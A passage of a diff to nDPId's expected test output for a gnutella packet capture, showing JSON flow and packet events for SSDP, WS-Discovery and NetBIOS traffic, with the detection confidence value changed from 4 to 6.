00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":13443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":13443,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAABgHO4AAIARBJIKAAIPCgAC\/wCJAIkATEdmnCspEAABAAAAAAABIEVORkRFRkVFRUhFRkZIRUpFT0RCREFDQUNBQ0FDQUNBAAAgAAHADAAgAAEABJPgAAYAAAoAAg8="} @@ -64,18 +64,18 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":13765,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":13765,"pkt":"MzMAAAACCAAn5uVZht1gAAAAABA6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAChQDYkwAAAAABAQgAJ+blWQ=="} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15284,"flow_last_seen":15284,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":15284,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":15284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":15284,"pkt":"AQBef\/\/6CAAn5uVZCABFAACl4I8AAAQR2a8KAAIP7\/\/\/+vnaB2wAkQ9eTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15284,"flow_last_seen":15284,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":15284,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15284,"flow_last_seen":15284,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":15284,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15285,"flow_last_seen":15285,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":15285,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":15285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":157,"pkt_l4_len":103,"thread_ts_msec":15285,"pkt":"MzMAAAAMCAAn5uVZht1gDyjoAGcRBP6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dgHbABnVAhNLVNFQVJDSCAqIEhUVFAvMS4xDQpIb3N0OiBbRkYwMjo6Q106MTkwMA0KU1Q6IHVwbnA6cm9vdGRldmljZQ0KTWFuOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15285,"flow_last_seen":15285,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":15285,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15285,"flow_last_seen":15285,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":15285,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":15285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":15285,"pkt":"AQBef\/\/6CAAn5uVZCABFAACB4JAAAAQR2dIKAAIP7\/\/\/+vnaB2wAbXqpTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cG5wOnJvb3RkZXZpY2UNCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":15468,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":153,"pkt_l4_len":99,"thread_ts_msec":15468,"pkt":"MzMAAQACCAAn5uVZht1gA+R4AGMRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQACAiICIwBj2+oBE9HtAAgAAgEtAAEADgABAAEkIvGzCAAn5uVZAAMADAUIACcAAAAAAAAAAAAnAA0AC01TRURHRVdJTjEwABAADgAAATcACE1TRlQgNS4wAAYACAARABcAGAAn"} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":15469,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":686,"pkt_l4_len":632,"thread_ts_msec":15469,"pkt":"MzMAAAAMCAAn5uVZht1gCQFeAngRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+d0OdgJ4bjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiIHhtbG5zOndzZHA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDYvMDIvZGV2cHJvZiI+PHNvYXA6SGVhZGVyPjx3c2E6VG8+dXJuOnNjaGVtYXMteG1sc29hcC1vcmc6d3M6MjAwNTowNDpkaXNjb3Zlcnk8L3dzYTpUbz48d3NhOkFjdGlvbj5odHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA0L2Rpc2NvdmVyeS9Qcm9iZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDozODVlNjBkOC0wOTJhLTRiMmItYmRmYy02YzJkMWQ1MGFjNDI8L3dzYTpNZXNzYWdlSUQ+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6UHJvYmU+PHdzZDpUeXBlcz53c2RwOkRldmljZTwvd3NkOlR5cGVzPjwvd3NkOlByb2JlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":15469,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":666,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":666,"pkt_l4_len":632,"thread_ts_msec":15469,"pkt":"AQBef\/\/6CAAn5uVZCABFAAKM4JIAAAER2sUKAAIP7\/\/\/+vncDnYCeP4aPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5IiB4bWxuczp3c2RwPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA2LzAyL2RldnByb2YiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvUHJvYmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6Mzg1ZTYwZDgtMDkyYS00YjJiLWJkZmMtNmMyZDFkNTBhYzQyPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlByb2JlPjx3c2Q6VHlwZXM+d3NkcDpEZXZpY2U8L3dzZDpUeXBlcz48L3dzZDpQcm9iZT48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":15469,"flow_last_seen":15469,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":15469,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":15500,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":157,"pkt_l4_len":103,"thread_ts_msec":15500,"pkt":"MzMAAAAMCAAn5uVZht1gDyjoAGcRBP6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dgHbABnVAhNLVNFQVJDSCAqIEhUVFAvMS4xDQpIb3N0OiBbRkYwMjo6Q106MTkwMA0KU1Q6IHVwbnA6cm9vdGRldmljZQ0KTWFuOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":15500,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":15500,"pkt":"AQBef\/\/6CAAn5uVZCABFAACB4JMAAAQR2c8KAAIP7\/\/\/+vnaB2wAbXqpTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cG5wOnJvb3RkZXZpY2UNCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":15624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":686,"pkt_l4_len":632,"thread_ts_msec":15624,"pkt":"MzMAAAAMCAAn5uVZht1gCQFeAngRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+d0OdgJ4bjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiIHhtbG5zOndzZHA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDYvMDIvZGV2cHJvZiI+PHNvYXA6SGVhZGVyPjx3c2E6VG8+dXJuOnNjaGVtYXMteG1sc29hcC1vcmc6d3M6MjAwNTowNDpkaXNjb3Zlcnk8L3dzYTpUbz48d3NhOkFjdGlvbj5odHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA0L2Rpc2NvdmVyeS9Qcm9iZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDozODVlNjBkOC0wOTJhLTRiMmItYmRmYy02YzJkMWQ1MGFjNDI8L3dzYTpNZXNzYWdlSUQ+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6UHJvYmU+PHdzZDpUeXBlcz53c2RwOkRldmljZTwvd3NkOlR5cGVzPjwvd3NkOlByb2JlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} @@ -84,26 +84,26 @@ 01259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":16062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":666,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":666,"pkt_l4_len":632,"thread_ts_msec":16062,"pkt":"AQBef\/\/6CAAn5uVZCABFAAKM4JcAAAER2sAKAAIP7\/\/\/+vncDnYCeP4aPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5IiB4bWxuczp3c2RwPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA2LzAyL2RldnByb2YiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvUHJvYmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6Mzg1ZTYwZDgtMDkyYS00YjJiLWJkZmMtNmMyZDFkNTBhYzQyPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlByb2JlPjx3c2Q6VHlwZXM+d3NkcDpEZXZpY2U8L3dzZDpUeXBlcz48L3dzZDpQcm9iZT48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":16487,"flow_last_seen":16487,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":16487,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":16487,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":16487,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHPgAAIARBAMKAAIPCgAC\/wCKAIoA0aFXEQKcLAoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQBg6gAATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} -00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":16487,"flow_last_seen":16487,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":16487,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":16487,"flow_last_seen":16487,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":16487,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":17749,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":17749,"pkt":"MzMAAAACCAAn5uVZht1gAAAAABA6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAChQDYkwAAAAABAQgAJ+blWQ=="} 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":18297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":157,"pkt_l4_len":103,"thread_ts_msec":18297,"pkt":"MzMAAAAMCAAn5uVZht1gDyjoAGcRBP6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dgHbABnVAhNLVNFQVJDSCAqIEhUVFAvMS4xDQpIb3N0OiBbRkYwMjo6Q106MTkwMA0KU1Q6IHVwbnA6cm9vdGRldmljZQ0KTWFuOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40005,"flow_last_seen":40005,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":40005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":40005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":40005,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4KUAAAER3HQKAAIP7\/\/\/+tmcB2wAthOSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40005,"flow_last_seen":40005,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":40005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 